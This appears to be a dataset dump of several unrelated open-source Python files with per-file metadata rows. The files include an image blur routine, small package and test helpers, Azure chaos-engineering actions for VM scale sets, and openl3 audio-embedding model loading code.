pixel_9.red) // 9 avg_green = (pixel_1.green + pixel_2.green + pixel_3.green + pixel_4.green + pixel_start.green + pixel_6.green + pixel_7.green + pixel_8.green + pixel_9.green) // 9 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_3.blue + pixel_4.blue + pixel_start.blue + pixel_6.blue + pixel_7.blue + pixel_8.blue + pixel_9.blue) // 9 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and (img.height - 1) > y >= 1: # for pixel which were on the left edge. 
pixel_start = img.get_pixel(x, y) # pixel_5 pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_6 = img.get_pixel(x + 1, y) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_2.red + pixel_3.red + pixel_start.red + pixel_6.red + pixel_8.red + pixel_9.red) // 6 avg_green = (pixel_2.green + pixel_3.green + pixel_start.green + pixel_6.green + pixel_8.green + pixel_9.green) // 6 avg_blue = (pixel_2.blue + pixel_3.blue + pixel_start.blue + pixel_6.blue + pixel_8.blue + pixel_9.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif (img.width - 1) > x >= 1 and y == 0: # for pixel which were on the top edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_4.red + pixel_start.red + pixel_6.red + pixel_7.red + pixel_8.red + pixel_9.red) // 6 avg_green = (pixel_4.green + pixel_start.green + pixel_6.green + pixel_7.green + pixel_8.green + pixel_9.green) // 6 avg_blue = (pixel_4.blue + pixel_start.blue + pixel_6.blue + pixel_7.blue + pixel_8.blue + pixel_9.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and (img.height - 1) > y >= 1: # for pixel which were on the right edge. 
pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_4.red + pixel_start.red + pixel_7.red + pixel_8.red) // 6 avg_green = (pixel_1.green + pixel_2.green + pixel_4.green + pixel_start.green + pixel_7.green + pixel_8.green) // 6 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_4.blue + pixel_start.blue + pixel_7.blue + pixel_8.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif (img.width - 1) > x >= 1 and y == img.height - 1: # for pixel which were on the bottom edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_3.red + pixel_4.red + pixel_start.red + pixel_6.red) // 6 avg_green = (pixel_1.green + pixel_2.green + pixel_3.green + pixel_4.green + pixel_start.green + pixel_6.green) // 6 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_3.blue + pixel_4.blue + pixel_start.blue + pixel_6.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and y == 0: # for pixel in the corner (0, 0). 
pixel_start = img.get_pixel(x, y) # pixel_5 pixel_6 = img.get_pixel(x + 1, y) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_start.red + pixel_6.red + pixel_8.red + pixel_9.red) // 4 avg_green = (pixel_start.green + pixel_6.green + pixel_8.green + pixel_9.green) // 4 avg_blue = (pixel_start.blue + pixel_6.blue + pixel_8.blue + pixel_9.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and y == 0: # for pixel in the corner (x, 0). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_4 = img.get_pixel(x - 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_4.red + pixel_start.red + pixel_7.red + pixel_8.red) // 4 avg_green = (pixel_4.green + pixel_start.green + pixel_7.green + pixel_8.green) // 4 avg_blue = (pixel_4.blue + pixel_start.blue + pixel_7.blue + pixel_8.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and y == img.height - 1: # for pixel in the corner (0, y). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_6 = img.get_pixel(x + 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_2.red + pixel_3.red + pixel_start.red + pixel_6.red) // 4 avg_green = (pixel_2.green + pixel_3.green + pixel_start.green + pixel_6.green) // 4 avg_blue = (pixel_2.blue + pixel_3.blue + pixel_start.blue + pixel_6.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and y == img.height - 1: # for pixel in the corner (x, y). 
pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_4 = img.get_pixel(x - 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_4.red + pixel_start.red) // 4 avg_green = (pixel_1.green + pixel_2.green + pixel_4.green + pixel_start.green) // 4 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_4.blue + pixel_start.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue return new_img def main(): """ TODO: """ old_img = SimpleImage("images/smiley-face.png") old_img.show() blurred_img = blur(old_img) for i in range(5): blurred_img = blur(blurred_img) blurred_img.show() if __name__ == '__main__': main()
48.770833
118
0.521572
1,400
9,364
3.217857
0.055714
0.077248
0.14162
0.154495
0.885905
0.882797
0.874584
0.871476
0.854384
0.853052
0
0.047378
0.366617
9,364
191
119
49.026178
0.71219
0.072191
0
0.632653
0
0
0.003477
0.00255
0
0
0
0.005236
0
1
0.013605
false
0
0.006803
0
0.027211
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0e370c775c1faf7e2338ca28071392b5203e7342
147
py
Python
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
from .Thresholding import * from .AdaptiveThresholding import * from .Edges import * from .Corners import *
36.75
36
0.571429
12
147
7
0.5
0.357143
0
0
0
0
0
0
0
0
0
0
0.37415
147
4
37
36.75
0.913043
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7ec1eb7a080abc8e97cb21b21def5aa3f226460c
117
py
Python
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import pytest @pytest.fixture def engine_url(): return 'http://localhost/engine-rest'
13
41
0.65812
15
117
5.066667
0.866667
0
0
0
0
0
0
0
0
0
0
0.010204
0.162393
117
8
42
14.625
0.765306
0.179487
0
0
0
0
0.297872
0
0
0
0
0
0
1
0.25
true
0
0.25
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
7ee9a8b8ae242dab3019f8cc9e7d3cba9dabc3c9
116
py
Python
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
3
2018-08-14T09:33:52.000Z
2022-03-21T12:31:58.000Z
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
null
null
null
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
null
null
null
import inspect from pprint import pprint import example pprint(inspect.getmembers(example.B, inspect.isfunction))
16.571429
57
0.827586
15
116
6.4
0.533333
0.25
0
0
0
0
0
0
0
0
0
0
0.103448
116
6
58
19.333333
0.923077
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0.5
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
7d21f867d2deccb1e25471e24c6a68d3e5b9b0df
1,317
py
Python
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
no.py
rodrigondec/Grafos
dd3bb7ffd56909395cc211c6d68f9e3eaa5fa9ba
[ "Unlicense" ]
null
null
null
class No(object): """docstring for ClassName""" def __init__(self, identificador): super(No, self).__init__() self.identificador = identificador def __str__(self): return '['+self.identificador.__str__()+']' def str(self): return '['+self.identificador.__str__()+']' class NoValorado(No): """docstring for NoValued""" def __init__(self, identificador, valor): No.__init__(self, identificador) self.valor = valor def __str__(self): return '['+self.identificador.__str__()+'] {'+self.valor.__str__()+'}' def str(self): return '['+self.identificador.__str__()+'] {'+self.valor.__str__()+'}' class NoArvore(No): def __init__(self, identificador, pai): No.__init__(self, identificador) self.pai = pai def __str__(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'}' def str(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'}' class NoArvoreDist(NoArvore): def __init__(self, identificador, pai, distancia): NoArvore.__init__(self, identificador, pai) self.distancia = distancia def __str__(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'} ('+self.distancia.__str__()+')' def str(self): return '['+self.identificador.__str__()+'] {'+self.pai.__str__()+'} ('+self.distancia.__str__()+')'
27.4375
101
0.677297
147
1,317
5.306122
0.136054
0.348718
0.215385
0.164103
0.630769
0.492308
0.492308
0.45
0.4
0.4
0
0
0.116932
1,317
47
102
28.021277
0.670679
0.034928
0
0.5625
0
0
0.031746
0
0
0
0
0
0
1
0.375
false
0
0
0.25
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
7d385a88c1c424fa3e161db98687f83cfbd9f5da
17,171
py
Python
chaosazure/vmss/actions.py
chaostoolkit-incubator/chaostoolkit-azure
377a35651d999281379b49ceb406061649840d3f
[ "Apache-2.0" ]
23
2018-10-17T14:38:08.000Z
2022-02-23T13:21:30.000Z
chaosazure/vmss/actions.py
saibaldas/chaostoolkit-azure
7ac0ef4406c9f58375f507ad536777e4b3e045e0
[ "Apache-2.0" ]
116
2018-06-19T13:48:28.000Z
2022-03-24T08:59:19.000Z
chaosazure/vmss/actions.py
saibaldas/chaostoolkit-azure
7ac0ef4406c9f58375f507ad536777e4b3e045e0
[ "Apache-2.0" ]
31
2018-10-01T11:07:06.000Z
2022-03-24T17:06:08.000Z
from typing import Iterable, Mapping from chaoslib import Configuration, Secrets from logzero import logger from chaosazure import init_compute_management_client from chaosazure.common import cleanse from chaosazure.common.compute import command from chaosazure.vmss.fetcher import fetch_vmss, fetch_instances from chaosazure.vmss.records import Records __all__ = [ "delete_vmss", "restart_vmss", "stop_vmss", "deallocate_vmss", "burn_io", "fill_disk", "network_latency", "stress_vmss_instance_cpu" ] def delete_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Delete a virtual machine scale set instance at random. **Be aware**: Deleting a VMSS instance is an invasive action. You will not be able to recover the VMSS instance once you deleted it. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. 
Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting delete_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Deleting instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_delete( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def restart_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Restart a virtual machine scale set instance at random. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. 
Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting restart_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Restarting instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_restart( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def stop_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Stops instances from the filtered scale set either at random or by a defined instance criteria. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' instance_criteria : Iterable[Mapping[str, any]] Allows specification of criteria for selection of a given virtual machine scale set instance. If the instance_criteria is omitted, an instance will be chosen at random. All of the criteria within each item of the Iterable must match, i.e. AND logic is applied. The first item with all matching criterion will be used to select the instance. Criteria example: [ {"name": "myVMSSInstance1"}, { "name": "myVMSSInstance2", "instanceId": "2" } {"instanceId": "3"}, ] If the instances include two items. 
One with name = myVMSSInstance4 and instanceId = 2. The other with name = myVMSSInstance2 and instanceId = 3. The criteria {"instanceId": "3"} will be the first match since both the name and the instanceId did not match on the first criteria. """ logger.debug( "Starting stop_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Stopping instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_power_off( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def deallocate_vmss(filter: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Deallocate a virtual machine scale set instance at random. Parameters ---------- filter : str Filter the virtual machine scale set. If the filter is omitted all virtual machine scale sets in the subscription will be selected as potential chaos candidates. 
Filtering example: 'where resourceGroup=="myresourcegroup" and name="myresourcename"' """ logger.debug( "Starting deallocate_vmss: configuration='{}', filter='{}'".format( configuration, filter)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: logger.debug( "Deallocating instance: {}".format(instance['name'])) client = init_compute_management_client(secrets, configuration) client.virtual_machine_scale_set_vms.begin_deallocate( scale_set['resourceGroup'], scale_set['name'], instance['instance_id']) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def stress_vmss_instance_cpu( filter: str = None, duration: int = 120, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): logger.warning( "Deprecated usage of activity 'stress_vmss_instance_cpu'." " Please use activity 'stress_cpu' in favor since this" " activity will be removed in a future release.") return stress_cpu( filter, duration, timeout, instance_criteria, configuration, secrets) def stress_cpu(filter: str = None, duration: int = 120, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Stresses the CPU of a random VMSS instances in your selected VMSS. Similar to the stress_cpu action of the machine.actions module. Parameters ---------- filter : str, optional Filter the VMSS. If the filter is omitted all VMSS in the subscription will be selected as potential chaos candidates. duration : int, optional Duration of the stress test (in seconds) that generates high CPU usage. Defaults to 120 seconds. 
timeout : int Additional wait time (in seconds) for stress operation to be completed. Getting and sending data from/to Azure may take some time so it's not recommended to set this value to less than 30s. Defaults to 60 seconds. """ logger.debug( "Starting stress_vmss_instance_cpu:" " configuration='{}', filter='{}'," " duration='{}', timeout='{}'".format( configuration, filter, duration, timeout)) vmss_records = Records() vmss = fetch_vmss(filter, configuration, secrets) for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'cpu_stress_test') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration} ] } logger.debug( "Stressing CPU of VMSS instance: '{}'".format( instance['instance_id'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def burn_io(filter: str = None, duration: int = 60, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Increases the Disk I/O operations per second of the VMSS machine. Similar to the burn_io action of the machine.actions module. 
""" logger.debug( "Starting burn_io: configuration='{}', filter='{}', duration='{}'," " timeout='{}'".format(configuration, filter, duration, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'burn_io') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration} ] } logger.debug( "Burning IO of VMSS instance: '{}'".format(instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def fill_disk(filter: str = None, duration: int = 120, timeout: int = 60, size: int = 1000, path: str = None, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Fill the VMSS machine disk with random data. Similar to the fill_disk action of the machine.actions module. 
""" logger.debug( "Starting fill_disk: configuration='{}', filter='{}'," " duration='{}', size='{}', path='{}', timeout='{}'".format( configuration, filter, duration, size, path, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare(instance, 'fill_disk') fill_path = command.prepare_path(instance, path) parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration}, {'name': "size", 'value': size}, {'name': "path", 'value': fill_path} ] } logger.debug( "Filling disk of VMSS instance: '{}'".format( instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources') def network_latency(filter: str = None, duration: int = 60, delay: int = 200, jitter: int = 50, timeout: int = 60, instance_criteria: Iterable[Mapping[str, any]] = None, configuration: Configuration = None, secrets: Secrets = None): """ Increases the response time of the virtual machine. Similar to the network_latency action of the machine.actions module. 
""" logger.debug( "Starting network_latency: configuration='{}', filter='{}'," " duration='{}', delay='{}', jitter='{}', timeout='{}'".format( configuration, filter, duration, delay, jitter, timeout)) vmss = fetch_vmss(filter, configuration, secrets) vmss_records = Records() for scale_set in vmss: instances_records = Records() instances = fetch_instances(scale_set, instance_criteria, configuration, secrets) for instance in instances: command_id, script_content = command.prepare( instance, 'network_latency') parameters = { 'command_id': command_id, 'script': [script_content], 'parameters': [ {'name': "duration", 'value': duration}, {'name': "delay", 'value': delay}, {'name': "jitter", 'value': jitter} ] } logger.debug( "Increasing the latency of VMSS instance: '{}'".format( instance['name'])) _timeout = duration + timeout command.run( scale_set['resourceGroup'], instance, _timeout, parameters, secrets, configuration) instances_records.add(cleanse.vmss_instance(instance)) scale_set['virtualMachines'] = instances_records.output() vmss_records.add(cleanse.vmss(scale_set)) return vmss_records.output_as_dict('resources')
39.203196
79
0.600489
1,714
17,171
5.855309
0.124854
0.045436
0.030291
0.033479
0.754085
0.74711
0.713033
0.713033
0.709147
0.690315
0
0.004026
0.30569
17,171
437
80
39.292906
0.837779
0.205288
0
0.717857
0
0
0.133338
0.005741
0
0
0
0
0
1
0.032143
false
0
0.028571
0
0.092857
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
adb3678b9743e6f37eb71a8b7d1ffb7c03bef60e
111
py
Python
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
python/testData/multipleArgumentsCompletion/slashAndSingleStarParameter.after.py
06needhamt/intellij-community
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
[ "Apache-2.0" ]
null
null
null
def foo(a, /, b, *, c): print(a, b, c) def egg(): a = 1 b = 2 c = 3 foo(a, b, c=c)<caret>
12.333333
25
0.369369
23
111
1.782609
0.478261
0.146341
0.219512
0.292683
0
0
0
0
0
0
0
0.044776
0.396396
111
9
25
12.333333
0.567164
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0.142857
1
0
1
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
add698633fee311bc61e52df21ecee850389418e
45
py
Python
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
null
null
null
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
null
null
null
apps/utils/__init__.py
crisariasgg/RepinSolution
27e9b04ccc887b4300d77dda8657e761f9523123
[ "MIT" ]
1
2021-12-09T21:27:35.000Z
2021-12-09T21:27:35.000Z
from .shopify_upload_product_utility import *
45
45
0.888889
6
45
6.166667
1
0
0
0
0
0
0
0
0
0
0
0
0.066667
45
1
45
45
0.880952
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
bc07c2ed6f9406dbf21fcdfb091574d77c7aabde
23,945
py
Python
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
279
2018-11-14T21:37:16.000Z
2022-03-25T09:18:32.000Z
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
76
2018-10-31T18:13:11.000Z
2022-02-09T22:44:41.000Z
openl3/models.py
lclichen/openl3
07ac537ff0ed2bac4c09fa1f5a7371e2b9299cba
[ "MIT" ]
45
2018-11-14T21:44:21.000Z
2022-03-29T09:38:30.000Z
import os import warnings import sklearn.decomposition import numpy as np from .openl3_exceptions import OpenL3Error with warnings.catch_warnings(): # Suppress TF and Keras warnings when importing warnings.simplefilter("ignore") import tensorflow as tf import tensorflow.keras.backend as K from tensorflow.keras import Model from tensorflow.keras.layers import ( Input, Conv2D, Permute, BatchNormalization, MaxPooling2D, Flatten, Activation, Lambda) import tensorflow.keras.regularizers as regularizers VALID_FRONTENDS = ("librosa", "kapre") VALID_INPUT_REPRS = ("linear", "mel128", "mel256") VALID_CONTENT_TYPES = ("music", "env") VALID_AUDIO_EMBEDDING_SIZES = (6144, 512) VALID_IMAGE_EMBEDDING_SIZES = (8192, 512) def _log10(x): '''log10 tensorflow function.''' return tf.math.log(x) / tf.math.log(tf.constant(10, dtype=x.dtype)) def kapre_v0_1_4_magnitude_to_decibel(x, ref_value=1.0, amin=1e-10, dynamic_range=80.0): '''log10 tensorflow function.''' amin = tf.cast(amin or 1e-10, dtype=x.dtype) max_axis = tuple(range(K.ndim(x))[1:]) or None log_spec = 10. 
* _log10(K.maximum(x, amin)) return K.maximum( log_spec - K.max(log_spec, axis=max_axis, keepdims=True), -dynamic_range) def __fix_kapre_spec(func): '''Wraps the kapre composite layer interface to revert .''' def get_spectrogram(*a, return_decibel=False, **kw): seq = func(*a, return_decibel=False, **kw) if return_decibel: seq.add(Lambda(kapre_v0_1_4_magnitude_to_decibel)) seq.add(Permute((2, 1, 3))) # the output is (None, t, f, ch) instead of (None, f, t, ch), so gotta fix that return seq return get_spectrogram def _validate_audio_frontend(frontend='kapre', input_repr=None, model=None): '''Make sure that the audio frontend matches the model and input_repr.''' ndims = len(model.input_shape) if model is not None else None # if frontend == 'infer': # detect which frontend to use # if model is None: # default # frontend = 'kapre' # elif ndims == 3: # shape: [batch, channel, samples] # frontend = 'kapre' # elif ndims == 4: # shape: [batch, frequency, time, channel] # frontend = 'librosa' # else: # raise OpenL3Error( # 'Invalid model input shape: {}. Expected a model ' # 'with either a 3 or 4 dimensional input, got {}.'.format(model.input_shape, ndims)) if frontend not in VALID_FRONTENDS: raise OpenL3Error('Invalid frontend "{}". Must be one of {}'.format(frontend, VALID_FRONTENDS)) # validate that our model shape matches our frontend. if ndims is not None: if frontend == 'kapre' and ndims != 3: raise OpenL3Error('Invalid model input shape: {}. Expected 3 dims got {}.'.format(model.input_shape, ndims)) if frontend == 'librosa' and ndims != 4: raise OpenL3Error('Invalid model input shape: {}. Expected 4 dims got {}.'.format(model.input_shape, ndims)) if input_repr is None: if frontend == 'librosa': raise OpenL3Error('You must specify input_repr for a librosa frontend.') else: input_repr = 'mel256' if str(input_repr) not in VALID_INPUT_REPRS: raise OpenL3Error('Invalid input representation "{}". 
Must be one of {}'.format(input_repr, VALID_INPUT_REPRS)) return frontend, input_repr AUDIO_POOLING_SIZES = { 'linear': { 6144: (8, 8), 512: (32, 24), }, 'mel128': { 6144: (4, 8), 512: (16, 24), }, 'mel256': { 6144: (8, 8), 512: (32, 24), } } IMAGE_POOLING_SIZES = { 8192: (7, 7), 512: (28, 28), } def load_audio_embedding_model(input_repr, content_type, embedding_size, frontend='kapre'): """ Returns a model with the given characteristics. Loads the model if the model has not been loaded yet. Parameters ---------- input_repr : "linear", "mel128", or "mel256" Spectrogram representation used for audio model. content_type : "music" or "env" Type of content used to train embedding. embedding_size : 6144 or 512 Embedding dimensionality. frontend : "kapre" or "librosa" The audio frontend to use. If frontend == 'kapre', then the kapre frontend will be included. Otherwise no frontend will be added inside the keras model. Returns ------- model : tf.keras.Model Model object. """ model_path = get_audio_embedding_model_path(input_repr, content_type) return load_audio_embedding_model_from_path(model_path, input_repr, embedding_size, 